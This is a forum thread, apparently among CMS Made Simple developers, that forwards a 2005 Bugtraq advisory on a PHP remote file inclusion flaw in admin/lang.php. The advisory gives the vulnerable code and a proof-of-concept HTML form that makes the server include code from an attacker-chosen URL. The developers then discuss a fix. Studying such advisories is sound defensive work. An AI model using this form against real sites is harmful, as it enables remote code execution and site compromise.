next »

[Akrabat]

I belong to phpsec, a security mailing list and this mail turned up this morning.  Not sure if you've seen it yet Wishy?

------ Forwarded Message
From: <groszynskif@gmail.com>
Date: 31 Aug 2005 19:18:04 -0000
To: <bugtraq@securityfocus.com>
Subject: CMS Made Simple <= 0.10 - PHP injection

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: CMS Made Simple - PHP injection
   Version <= 0.10
   Homepage: http://www.cmsmadesimple.org/

   Author: Filip Groszynski (VXSfx)
   Date: 31 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

 CMS Made Simple is an easy to use content managment system for simple stable content site. Uses PHP, MySQL  and Smarty templating system.

   --------------------------------------------------------
   
   Vulnerable code exist in ./admin/lang.php:

   <?php
  ...
 $current_language = "en_US";
 #Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
  ...
  #Check to see if there is already a language in use...
  if (isset($_POST["change_cms_lang"])) {
[!]   $current_language = $_POST["change_cms_lang"];
   setcookie("cms_language", $_POST["change_cms_lang"]);
  } else if (isset($_COOKIE["cms_language"])) {
   $current_language = $_COOKIE["cms_language"];
  }
  else {
   ...
  }

  #Ok, we have a language to load, let's load it already...
  if (isset($nls['file'][$current_language])) {
   foreach ($nls['file'][$current_language] as $onefile) {
[!]    include($onefile);
   }
  }
  ...
 }
 ...
   ?>
   --------------------------------------------------------

   Exploit:

 example.html:
   <form
action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vx
sfx]=(__URL__)" method=post>
   <input type=hidden name=change_cms_lang value=vx>
   <input type=submit name=test VALUE="do it">
   </form>
 EOF

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif <|> gmail <|> com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --


------ End of Forwarded Message



--
[phpsec] Mailing List
Brought to you by php|architect - http://www.phparch.com

For account maintenance, please visit http://www.phparch.com/phpsec

Reading the example exploit, I'm pretty sure that it can only occur with register_globals set to on. However, still needs fixing.

Possible fix:
Ensure that $onefile is a local file within the expected cmsms directory before including it. (Probably have to store the "expected cms directory" as a define/const maybe?)


Rob...

[Ted]

Actually, I was going to release a fix this morning.  I was just going to make sure $nls and $lang were declared as blank arrays at the top of the page.  This way, even if $nls was passed with register_globals on, any offending URLs would get blown away.

Make sense?

[Ted]

http://forum.cmsmadesimple.org/index.php/topic,1554.0.html

[Akrabat]

Looks good to me.